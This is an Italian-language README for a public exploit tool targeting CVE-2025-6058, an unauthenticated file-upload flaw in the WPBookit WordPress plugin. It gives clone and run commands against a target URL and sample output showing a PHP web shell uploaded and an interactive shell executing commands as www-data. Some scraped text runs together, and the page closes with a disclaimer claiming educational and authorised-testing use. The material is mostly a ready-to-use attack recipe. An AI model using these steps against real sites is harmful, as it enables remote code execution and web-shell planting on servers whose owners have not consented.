
WordPress WPBookit ≤ 1.0.4 - Exploit di Caricamento File Non Autenticato
Exploit di Caricamento File Arbitrario Non Autenticato che colpisce il Plugin WPBookit per WordPress (≤ 1.0.4)
L'exploit permette il caricamento remoto di shell e la piena esecuzione di comandi.
Autore: 0xgh057r3c0n
CVE-2025-6058 è una vulnerabilità critica che interessa il plugin WPBookit su WordPress CMS. Un attaccante non autenticato può abusare di un endpoint AJAX vulnerabile per caricare file PHP arbitrari, consentendo l'Esecuzione Remota di Codice (RCE).
README.txtghost_shell.php)python3 --version
pip install requests
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://sito-wordpress-target.com
python3 CVE-2025-6058.py -u https://vittima.com
[>] Controllo versione plugin...
[+] Versione plugin trovata: 1.0.4
[!] La versione target è vulnerabile.
[>] Caricamento shell...
[+] Caricamento riuscito.
[+] URL shell: https://vittima.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
[!] GhostShell Interattiva Avviata — digita 'exit' per uscire.
┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data
ghost_shell.php/wp-content/uploads/YYYY/MM/ghost_shell.phphttps://sito-wordpress-target.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
Questo exploit è sviluppato per scopi educativi e solo per test di penetrazione autorizzati. L'uso non autorizzato contro sistemi senza esplicito consenso è illegale.
Rilasciato sotto Licenza MIT
Realizzato per il auditing della sicurezza di WordPress 🛡️ da 0xgh057r3c0n